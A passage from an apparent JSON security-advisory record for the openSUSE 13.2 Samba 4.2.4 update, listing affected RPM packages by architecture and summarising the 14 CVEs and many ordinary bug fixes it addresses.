"libwbclient0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libwbclient0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "samba-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libregistry0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libregistry0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-test-4.2.4-34.1.i586.rpm", "packageName": "samba-test", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "ctdb-tests-4.2.4-34.1.x86_64.rpm", "packageName": "ctdb-tests", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbldap0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbldap0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "ctdb-pcp-pmda-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "ctdb-pcp-pmda-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libregistry-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libregistry-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libnetapi0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libnetapi0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-util0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-util0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-policy0-4.2.4-34.1.i586.rpm", "packageName": "libsamba-policy0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-binding0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-binding0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-pidl-4.2.4-34.1.i586.rpm", "packageName": "samba-pidl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbldap0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbldap0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libdcerpc-binding0-4.2.4-34.1.i586.rpm", "packageName": "libdcerpc-binding0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libdcerpc-binding0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libdcerpc-binding0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-hostconfig0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libsamba-hostconfig0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-atsvc-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-atsvc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-client-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "samba-client-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-samr0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-samr0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-debugsource-4.2.4-34.1.x86_64.rpm", "packageName": "samba-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamdb0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsamdb0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-credentials0-4.2.4-34.1.i586.rpm", "packageName": "libsamba-credentials0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-nbt0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-nbt0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "ctdb-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "ctdb-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libdcerpc-samr-devel-4.2.4-34.1.i586.rpm", "packageName": "libdcerpc-samr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-hostconfig-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-hostconfig-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-policy0-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-policy0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-nbt0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-nbt0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-python-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "samba-python-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libgensec0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libgensec0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamdb-devel-4.2.4-34.1.i586.rpm", "packageName": "libsamdb-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr0-4.2.4-34.1.x86_64.rpm", "packageName": "libndr0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libndr-nbt-devel-4.2.4-34.1.i586.rpm", "packageName": "libndr-nbt-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libregistry0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libregistry0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-passdb-devel-4.2.4-34.1.i586.rpm", "packageName": "libsamba-passdb-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-nbt0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-nbt0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-samr-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-samr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libtevent-util0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libtevent-util0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "ctdb-tests-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "ctdb-tests-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-client-4.2.4-34.1.x86_64.rpm", "packageName": "samba-client", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-libs-4.2.4-34.1.x86_64.rpm", "packageName": "samba-libs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-passdb0-4.2.4-34.1.i586.rpm", "packageName": "libsamba-passdb0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsmbconf0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libsmbconf0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-test-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "samba-test-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-hostconfig0-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-hostconfig0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbclient-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbclient-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libgensec0-4.2.4-34.1.x86_64.rpm", "packageName": "libgensec0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-policy0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-policy0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libdcerpc-devel-4.2.4-34.1.i586.rpm", "packageName": "libdcerpc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-4.2.4-34.1.i586.rpm", "packageName": "samba", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbconf0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbconf0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc0-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-test-devel-4.2.4-34.1.i586.rpm", "packageName": "samba-test-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libwbclient0-4.2.4-34.1.i586.rpm", "packageName": "libwbclient0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamdb-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libsamdb-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamdb0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libsamdb0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-credentials0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-credentials0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libwbclient0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libwbclient0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-core-devel-4.2.4-34.1.x86_64.rpm", "packageName": "samba-core-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-policy0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-policy0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-test-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "samba-test-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libnetapi-devel-4.2.4-34.1.i586.rpm", "packageName": "libnetapi-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-samr0-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-samr0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libwbclient-devel-4.2.4-34.1.i586.rpm", "packageName": "libwbclient-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-libs-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "samba-libs-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-atsvc0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-atsvc0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsmbconf0-4.2.4-34.1.i586.rpm", "packageName": "libsmbconf0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "ctdb-pcp-pmda-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "ctdb-pcp-pmda-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libdcerpc-samr0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libdcerpc-samr0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libnetapi0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libnetapi0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "samba-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libregistry-devel-4.2.4-34.1.i586.rpm", "packageName": "libregistry-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libdcerpc-binding0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libdcerpc-binding0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "samba-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-util0-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-util0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "ctdb-devel-4.2.4-34.1.x86_64.rpm", "packageName": "ctdb-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libgensec0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libgensec0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-krb5pac0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-krb5pac0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-winbind-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "samba-winbind-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-winbind-4.2.4-34.1.i586.rpm", "packageName": "samba-winbind", "operator": "lt"}], "description": "samba was updated to version 4.2.4 to fix 14 security issues.\n\n These security issues were fixed:\n - CVE-2015-5370: DCERPC server and client were vulnerable to DOS and MITM\n attacks (bsc#936862).\n - CVE-2016-2110: A man-in-the-middle could have downgraded NTLMSSP\n authentication (bsc#973031).\n - CVE-2016-2111: Domain controller netlogon member computer could have\n been spoofed (bsc#973032).\n - CVE-2016-2112: LDAP conenctions were vulnerable to downgrade and MITM\n attack (bsc#973033).\n - CVE-2016-2113: TLS certificate validation were missing (bsc#973034).\n - CVE-2016-2115: Named pipe IPC were vulnerable to MITM attacks\n (bsc#973036).\n - CVE-2016-2118: "Badlock" DCERPC impersonation of authenticated account\n were possible (bsc#971965).\n - CVE-2015-3223: Malicious request can cause Samba LDAP server to hang,\n spinning using CPU (boo#958581).\n - CVE-2015-5330: Remote read memory exploit in LDB (boo#958586).\n - CVE-2015-5252: Insufficient symlink verification (file access outside\n the share)(boo#958582).\n - CVE-2015-5296: No man in the middle protection when forcing smb\n encryption on the client side (boo#958584).\n - CVE-2015-5299: Currently the snapshot browsing is not secure thru\n windows previous version (shadow_copy2) (boo#958583).\n - CVE-2015-8467: Fix Microsoft MS15-096 to prevent machine accounts from\n being changed into user accounts (boo#958585).\n - CVE-2015-7560: Getting and setting Windows ACLs on symlinks can change\n permissions on link target (boo#968222).\n\n These non-security issues were fixed:\n - Fix samba.tests.messaging test and prevent potential tdb corruption by\n removing obsolete now invalid tdb_close call; (boo#974629).\n - Align fsrvp feature sources with upstream version.\n - Obsolete libsmbsharemodes0 from samba-libs and libsmbsharemodes-devel\n from samba-core-devel; (boo#973832).\n - s3:utils/smbget: Fix recursive download; (bso#6482).\n - s3: smbd: posix_acls: Fix check for setting u:g:o entry on a filesystem\n with no ACL support; (bso#10489).\n - docs: Add example for domain logins to smbspool man page; (bso#11643).\n - s3-client: Add a KRB5 wrapper for smbspool; (bso#11690).\n - loadparm: Fix memory leak issue; (bso#11708).\n - lib/tsocket: Work around sockets not supporting FIONREAD; (bso#11714).\n - ctdb-scripts: Drop use of "smbcontrol winbindd ip-dropped ...";\n (bso#11719).\n - s3:smbd:open: Skip redundant call to file_set_dosmode when creating a\n new file; (bso#11727).\n - param: Fix str_list_v3 to accept ";" again; (bso#11732).\n - Real memeory leak(buildup) issue in loadparm; (bso#11740).\n - Obsolete libsmbclient from libsmbclient0 and libpdb-devel from\n libsamba-passdb-devel while not providing it; (boo#972197).\n - Upgrade on-disk FSRVP server state to new version; (boo#924519).\n - Only obsolete but do not provide gplv2/3 package names; (boo#968973).\n - Enable clustering (CTDB) support; (boo#966271).\n - s3: smbd: Fix timestamp rounding inside SMB2 create; (bso#11703);\n (boo#964023).\n - vfs_fruit: Fix renaming directories with open files; (bso#11065).\n - Fix MacOS finder error 36 when copying folder to Samba; (bso#11347).\n - s3:smbd/oplock: Obey kernel oplock setting when releasing oplocks;\n (bso#11400).\n - Fix copying files with vfs_fruit when using vfs_streams_xattr without\n stream prefix and type suffix; (bso#11466).\n - s3:libsmb: Correctly initialize the list head when keeping a list of\n primary followed by DFS connections; (bso#11624).\n - Reduce the memory footprint of empty string options; (bso#11625).\n - lib/async_req: Do not install async_connect_send_test; (bso#11639).\n - docs: Fix typos in man vfs_gpfs; (bso#11641).\n - smbd: make "hide dot files" option work with "store dos attributes =\n yes"; (bso#11645).\n - smbcacls: Fix uninitialized variable; (bso#11682).\n - s3:smbd: Ignore initial allocation size for directory creation;\n (bso#11684).\n - Changing log level of two entries to from 1 to 3; (bso#9912).\n - vfs_gpfs: Re-enable share modes; (bso#11243).\n - wafsamba: Also build libraries with RELRO protection; (bso#11346).\n - ctdb: Strip trailing spaces from nodes file; (bso#11365).\n - s3-smbd: Fix old DOS client doing wildcard delete - gives a attribute\n type of zero; (bso#11452).\n - nss_wins: Do not run into use after free issues when we access memory\n allocated on the globals and the global being reinitialized; (bso#11563).\n - async_req: Fix non-blocking connect(); (bso#11564).\n - auth: gensec: Fix a memory leak; (bso#11565).\n - lib: util: Make non-critical message a warning; (bso#11566).\n - Fix winbindd crashes with samlogon for trusted domain user; (bso#11569);\n (boo#949022).\n - smbd: Send SMB2 oplock breaks unencrypted; (bso#11570).\n - ctdb: Open the RO tracking db with perms 0600 instead of 0000;\n (bso#11577).\n - manpage: Correct small typo error; (bso#11584).\n - s3: smbd: If EA's are turned off on a share don't allow an SMB2 create\n containing them; (bso#11589).\n - Backport some valgrind fixes from upstream master; (bso#11597).\n - s3: smbd: have_file_open_below() fails to enumerate open files below an\n open directory handle; (bso#11615).\n - docs: Fix some typos in the idmap config section of man 5 smb.conf;\n (bso#11619).\n - Remove redundant configure options while adding with-relro.\n - s3: smbd: Fix our access-based enumeration on "hide unreadable" to match\n Windows; (bso#10252).\n - smbd: Fix file name buflen and padding in notify repsonse; (bso#10634).\n - kerberos: Make sure we only use prompter type when available;\n (bso#11038).\n - s3:ctdbd_conn: Make sure we destroy tevent_fd before closing the socket;\n (bso#11316).\n - dcerpc.idl: accept invalid dcerpc_bind_nak pdus; (bso#11327).\n - Fix a deadlock in tdb; (bso#11381).\n - s3: smbd: Fix mkdir race condition; (bso#11486).\n - pam_winbind: Fix a segfault if initialization fails; (bso#11502).\n - s3: dfs: Fix a crash when the dfs targets are disabled; (bso#11509).\n - s3: smbd: Fix opening/creating :stream files on the root share\n directory; (bso#11522).\n - net: Fix a crash with 'net ads keytab create'; (bso#11528).\n - s3: smbd: Fix a crash in unix_convert() and a NULL pointer bug\n introduced by previous 'raw' stream fix (bso#11522); (bso#11535).\n - vfs_fruit: Return value of ad_pack in vfs_fruit.c; (bso#11543).\n - vfs_commit: Set the fd on open before calling SMB_VFS_FSTAT; (bso#11547).\n - Fix bug in smbstatus where the lease info is not printed; (bso#11549).\n - s3:smbstatus: Add stream name to share_entry_forall(); (bso#11550).\n - Relocate the tmpfiles.d directory to the client package; (boo#947552).\n - Do not provide libpdb0 from libsamba-passdb0 but add it to baselibs.conf\n instead; (boo#942716).\n - Package /var/lib/samba/private/sock with 0700 permissions; (boo#946051).\n - auth/credentials: If credentials have principal set, they are not\n anonymous anymore; (bso#11265).\n - Fix stream names with colon with "fruit:encoding = native"; (bso#11278).\n - s4:rpc_server/netlogon: Fix for NetApp; (bso#11291).\n - lib: Fix rundown of open_socket_out(); (bso#11316).\n - s3:lib: Fix some corner cases of open_socket_out_cleanup(); (bso#11316).\n - vfs:fruit: Implement copyfile style copy_chunk; (bso#11317).\n - ctdb-daemon: Return correct sequence number for CONTROL_GET_DB_SEQNUM;\n (bso#11398).\n - ctdb-scripts: Support monitoring of interestingly named VLANs on bonds;\n (bso#11399).\n - ctdb-daemon: Improve error handling for running event scripts;\n (bso#11431).\n - ctdb-daemon: Check if updates are in flight when releasing all IPs;\n (bso#11432).\n - ctdb-build: Fix building of PCP PMDA module; (bso#11435).\n - Backport dcesrv_netr_DsRGetDCNameEx2 fixes; (bso#11454).\n - vfs_fruit: Handling of empty resource fork; (bso#11467).\n - Avoid quoting problems in user's DNs; (bso#11488).\n - s3-auth: Fix "map to guest = Bad uid"; (bso#9862).\n - s4:lib/tls: Fix build with gnutls 3.4; (bso#8780).\n - s4.2/fsmo.py: Fixed fsmo transfer exception; (bso#10924).\n - winbindd: Sync secrets.ldb into secrets.tdb on startup; (bso#10991).\n - Logon via MS Remote Desktop hangs; (bso#11061).\n - s3: lib: util: Ensure we read a hex number as %x, not %u; (bso#11068).\n - tevent: Add a note to tevent_add_fd(); (bso#11141).\n - s3:param/loadparm: Fix 'testparm --show-all-parameters'; (bso#11170).\n - s3-unix_msg: Remove socket file after closing socket fd; (bso#11217).\n - smbd: Fix a use-after-free; (bso#11218); (boo#919309).\n - s3-rpc_server: Fix rpc_create_tcpip_sockets() processing of interfaces;\n (bso#11245).\n - s3:smb2: Add padding to last command in compound requests; (bso#11277).\n - Add IPv6 support to ADS client side LDAP connects; (bso#11281).\n - Add IPv6 support for determining FQDN during ADS join; (bso#11282).\n - s3: IPv6 enabled DNS connections for ADS client; (bso#11283).\n - Fix invalid write in ctdb_lock_context_destructor; (bso#11293).\n - Excessive cli_resolve_path() usage can slow down transmission;\n (bso#11295).\n - vfs_fruit: Add option "veto_appledouble"; (bso#11305).\n - tstream: Make socketpair nonblocking; (bso#11312).\n - idmap_rfc2307: Fix wbinfo '--gid-to-sid' query; (bso#11313).\n - Group creation: Add msSFU30Name only when --nis-domain was given;\n (bso#11315).\n - tevent_fd needs to be destroyed before closing the fd; (bso#11316).\n - Build fails on Solaris 11 with "\u00c3\u00a2\u00c2\u0080\u00c2\u0098PTHREAD_MUTEX_ROBUST\u00c3\u00a2\u00c2\u0080\u00c2\u0099 undeclared";\n (bso#11319).\n - smbd/trans2: Add a useful diagnostic for files with bad encoding;\n (bso#11323).\n - Change sharesec output back to previous format; (bso#11324).\n - Robust mutex support broken in 1.3.5; (bso#11326).\n - Kerberos auth info3 should contain resource group ids available from\n pac_logon; winbindd: winbindd_raw_kerberos_login - ensure logon_info\n exists in PAC; (bso#11328); (boo#912457).\n - s3:smb2_setinfo: Fix memory leak in the defer_rename case; (bso#11329).\n - tevent: Fix CID 1035381 Unchecked return value; (bso#11330).\n - tdb: Fix CID 1034842 and 1034841 Resource leaks; (bso#11331).\n - s3: smbd: Use separate flag to track become_root()/unbecome_root()\n state; (bso#11339).\n - s3: smbd: Codenomicon crash in do_smb_load_module(); (bso#11342).\n - pidl: Make the compilation of PIDL producing the same results if the\n content hasn't change; (bso#11356).\n - winbindd: Disconnect child process if request is cancelled at main\n process; (bso#11358).\n - vfs_fruit: Check offset and length for AFP_AfpInfo read requests;\n (bso#11363).\n - docs: Overhaul the description of "smb encrypt" to include SMB3\n encryption; (bso#11366).\n - s3:auth_domain: Fix talloc problem in\n connect_to_domain_password_server(); (bso#11367).\n - ncacn_http: Fix GNUism; (bso#11371).\n - Backport changes to use resource group sids obtained from pac\n logon_info; (bso#11328); (boo#912457).\n - Order winbind.service Before and Want nss-user-lookup target.\n - s3:smbXsrv: refactor duplicate code into\n smbXsrv_session_clear_and_logoff(); (bso#11182).\n - gencache: don't fail gencache_stabilize if there were records to delete;\n (bso#11260).\n - s3: libsmbclient: After getting attribute server, ensure main srv\n pointer is still valid; (bso#11186).\n - s4: rpc: Refactor dcesrv_alter() function into setup and send steps;\n (bso#11236).\n - s3: smbd: Incorrect file size returned in the response of\n "FILE_SUPERSEDE Create"; (bso#11240).\n - Mangled names do not work with acl_xattr; (bso#11249).\n - nmbd rewrites browse.dat when not required; (bso#11254).\n - vfs_fruit: add option "nfs_aces" that controls the NFS ACEs stuff;\n (bso#11213).\n - s3:smbd: Add missing tevent_req_nterror; (bso#11224).\n - vfs: kernel_flock and named streams; (bso#11243).\n - vfs_gpfs: Error code path doesn't call END_PROFILE; 